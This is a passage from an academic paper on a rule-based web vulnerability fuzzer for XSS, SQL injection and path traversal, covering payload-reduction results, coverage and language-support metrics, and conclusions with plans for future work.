Table 15 Number of payloads for SQL injection detection
Table 16 Number of payloads for PT detection
Table 17 Comparison table: language support and vulnerability coverage

As can be observed, the optimization strategies resulted in a 13% reduction in the number of payloads used for XSS detection, a 56% reduction in the number of payloads used for SQL injection detection, and a remarkable 91% reduction for path traversal detection. This indicates that the non-optimized rule-based fuzzer’s input payload set contained numerous inputs with similar features, as discussed in Sect. 7.2.

7.3 Additional performance metrics

In order to evaluate the effectiveness of the optimization strategies and enhance the assessment of scanners, it is possible to include additional performance metrics. As noted earlier, improving a scanner’s performance involves reducing the number of payloads while maintaining or even enhancing its effectiveness. Two additional vital metrics are the scanner’s vulnerability coverage and its compatibility with various source code languages. Notably, many scanners in the literature are specialized for a single vulnerability type or can only be applied to web applications developed in specific programming languages [49].

In summary, two new performance metrics can be defined:

  • Vulnerability Coverage (VC): VC measures the number of vulnerabilities that a scanner is capable of identifying;

  • Language Support (LS): LS assesses the range of programming languages supported by the scanner.

We conducted an analysis of vulnerability coverage and language support based on 38 studies included in Zhang et al.’s 2021 survey [49]. The results are presented in Table 17.

Figure 10 illustrates that 57.9% of the scanners mentioned in the survey’s references primarily focus on a single vulnerability, while only 18.4% of them cover all three different types of vulnerabilities. Among these, only two also happen to be language-independent (see Fig. 11).

Fig. 10 Scanners and vulnerability coverage

Fig. 11 Vulnerability coverage per language

Unfortunately, many works do not make their source code publicly available, making it challenging to replicate experiments or build upon the authors’ approaches. In contrast, we have made our source code publicly accessible to facilitate the improvement and extension of our approach. Table 18 presents a summary of the key performance metrics, including Accuracy, Precision, Recall, and Number of Payloads, attained by our fuzzer before and after implementing the discussed optimizations.Footnote 6

Table 18 Comparison after the application of optimization steps

8 Conclusions

In this work, we have introduced a rule-based fuzzer designed to detect web application injection vulnerabilities, with a particular focus on cross-site scripting, SQL Injection, and Path Traversal. It is worth noting that our proposed approach can be adapted to identify various types of input-based vulnerabilities. We conducted a comprehensive performance analysis comparing our system with Zed Attack Proxy (ZAP), one of the most widely used web application security scanners. Our results demonstrate that the rule-based approach can yield comparable outcomes to those achieved with ZAP. Additionally, we discussed how optimizing payloads, observations, and rules can enhance the performance of our rule-based fuzzer.

We have identified the number of used payloads as a crucial performance metric and have shown that it can be reduced through specific optimization criteria. Nevertheless, there is room for further payload reduction through the exploration of alternative approaches.

As part of our future work, we intend to concentrate on devising a payload optimization strategy to maximize vulnerability coverage while minimizing the number of payloads used. Drawing from past experience [40], we believe that an approach rooted in Reinforcement Learning (RL) can be instrumental in achieving this objective. With RL, we can train an agent to detect all vulnerabilities within a predefined environment while minimizing payload usage.

In recent years, Large Language Models (LLMs) have made substantial contributions to natural language processing (NLP) [87]. Several contemporary approaches are investigating the security implications of generating source code using such models [88, 89]. They aim to determine whether these models can be leveraged to identify and rectify security vulnerabilities in source code [90, 91, 92]. While these approaches typically operate in a white-box context, there is potential for our work to benefit from the adoption of LLMs. As elaborated in Sect. 7, optimization criteria encompass tasks such as application profiling, input enumeration, and response analysis. These are areas where Natural Language Processing techniques could be applied effectively. In future research, we plan to explore this avenue to enhance our work.

The results we have presented in this work are contingent on the test suite we used. Although some research endeavors have attempted to gauge the effectiveness of test suites for evaluating web scanners, no formalized test suite currently exists that guarantees complete vulnerability coverage of a web scanner [49]. In future endeavors, we intend to delve into this issue, aiming to formalize performance metrics for web application vulnerability test suites. This will involve delineating the limitations of existing platforms and proposing enhanced alternatives.

Our forthcoming efforts will also be directed toward enhancing the Oracle module by introducing assertions and vulnerability observations. In this context, an evolved rule-based approach may harness a reinforcement learning model to automatically generate rules. The modular architecture of our platform facilitates the collection of requests from a training environment, replication within a specific test environment, and performance evaluation.

We are optimistic that our work will serve as a valuable resource for security researchers seeking to explore novel fuzzing approaches for identifying input-handling vulnerabilities.